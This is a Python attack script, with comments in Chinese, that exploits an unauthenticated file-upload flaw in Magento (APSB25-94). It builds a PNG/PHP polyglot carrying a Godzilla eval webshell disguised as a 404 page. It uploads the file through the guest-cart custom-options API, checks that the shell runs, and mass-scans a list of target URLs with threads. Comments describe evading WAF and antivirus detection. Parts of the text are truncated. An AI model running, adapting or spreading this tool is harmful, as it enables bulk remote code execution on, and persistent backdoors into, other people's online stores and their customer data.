#!/usr/bin/env python3 """ Magento APSB25-94 — Unauthenticated File Upload to RCE Modified: Upload Godzilla webshell + multi-threaded batch scan Usage: python3 magento_godzilla.py -f urls.txt [-t 20] [-p pass] [-k key] """ import requests import base64 import random import string import struct import zlib import argparse import time from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urlparse import threading import sys import functools print = functools.partial(print, flush=True) requests.packages.urllib3.disable_warnings() # ─── Godzilla Webshell (PHP_EVAL_XOR_BASE64) ─── # 默认连接参数: pass=pass key=key # Godzilla 客户端选择: PHP -> PhpEvalXor -> base64 # 一句话 eval shell(带 404 伪装) SHELL_TEMPLATE = r"""404 Not Found

Not Found

The requested URL was not found on this server.

';exit;}eval($_POST['{pass}']);?>""" # 无害探测文件 — 不含 eval/system/exec 等敏感函数,不触发 WAF/AV # 仅 echo 一个标记字符串,用于确认:1) 文件上传成功 2) PHP 可执行 PROBE_TEMPLATE = r"""""" PROBE_MARKER = "PROBE_OK_" SHELL_404_MARKER = "was not found on this server" TINY_PNG = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAD0lEQVR4AQEEAPv/AHf66QRGAluYv6aFAAAAAElFTkSuQmCC" JSON_HEADERS = {"Accept": "application/json", "Content-Type": "application/json"} TIMEOUT = 30 counter_lock = threading.Lock() stats = {"total": 0, "vuln": 0, "uploaded": 0, "fail": 0} # 写文件锁 — 每条结果立刻落盘,Ctrl+C 也不丢数据 write_lock = threading.Lock() output_path = None # main 里赋值 def queue_result(line): """立刻写一条结果到文件""" with write_lock: with open(output_path, "a", encoding="utf-8") as f: f.write(line + "\n") f.flush() def flush_results(): """兼容旧调用,现在每条都即时写了,这里什么都不做""" pass UPLOAD_PATHS = [ "/pub/media/custom_options/quote/{0}/{1}/{2}", "/media/custom_options/quote/{0}/{1}/{2}", ] def banner(): print(""" ┌─────────────────────────────────────────────┐ │ Magento APSB25-94 Eval Shell Drop │ │ Unauthenticated File Upload → RCE │ └─────────────────────────────────────────────┘ """) def make_png_polyshell(php_code: bytes) -> bytes: """纯 Python 构造 PNG polyshell 技巧:在合法 PNG 数据末尾(IEND 之后)追加 PHP 代码。 PNG 解析器忽略 IEND 之后的数据,图片校验通过。 PHP 解析器扫描整个文件,找到 之间的代码会正常执行。 """ sig = b'\x89PNG\r\n\x1a\n' def make_chunk(chunk_type: bytes, data: bytes) -> bytes: raw = chunk_type + data return struct.pack('>I', len(data)) + raw + struct.pack('>I', zlib.crc32(raw) & 0xffffffff) ihdr_data = struct.pack('>IIBBBBB', 1, 1, 8, 2, 0, 0, 0) ihdr = make_chunk(b'IHDR', ihdr_data) idat = make_chunk(b'IDAT', zlib.compress(b'\x00\xff\x00\x00')) iend = make_chunk(b'IEND', b'') # PHP 代码追加在 IEND 之后 — PNG 合法,PHP 可执行 return sig + ihdr + idat + iend + php_code def build_payload(shell_code): """构造 PNG polyshell,无需 exiftool""" filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + '.php' png_bytes = make_png_polyshell(shell_code.encode('utf-8')) return filename, base64.b64encode(png_bytes).decode() def get_sku(session, base_url): """通过 GraphQL 获取任意商品 SKU""" query = '{ products(search: "", pageSize: 1) { items { sku } } }' resp = session.post( f"{base_url}/graphql", headers=JSON_HEADERS, json={"query": query}, timeout=TIMEOUT, verify=False ) return resp.json()['data']['products']['items'][0]['sku'] def create_cart(session, base_url): """创建 guest 购物车,返回 cart_id""" resp = session.post( f"{base_url}/rest/default/V1/guest-carts", headers=JSON_HEADERS, timeout=TIMEOUT, verify=False ) return resp.json() def upload_shell(session, base_url, cart_id, sku, b64_payload, filename): """通过 custom_options file_info 上传 polyshell""" json_body = { "cart_item": { "product_option": { "extension_attributes": { "custom_options": [{ "extension_attributes": { "file_info": { "base64_encoded_data": b64_payload, "name": filename, "type": "image/png" } }, "option_id": "12345", "option_value": "file" }] } }, "qty": 1, "sku": sku } } resp = session.post( f"{base_url}/rest/default/V1/guest-carts/{cart_id}/items", headers=JSON_HEADERS, json=json_body, timeout=TIMEOUT, verify=False ) return resp def check_shell(session, base_url, filename, shell_pass, **_): """探测上传后的 webshell 是否存在且可执行 判断逻辑: GET → HTTP 200 + body 含伪装 404 = PHP 执行了 POST → eval 验证,echo 标记字符串确认 RCE """ for path_tpl in UPLOAD_PATHS: url = base_url + path_tpl.format(filename[0], filename[1], filename) try: resp = session.get(url, timeout=TIMEOUT, verify=False) if resp.status_code == 404: continue if resp.status_code == 200 and SHELL_404_MARKER in resp.text: if ' 0: print(f" 结果已保存: {args.output}") if __name__ == "__main__": main()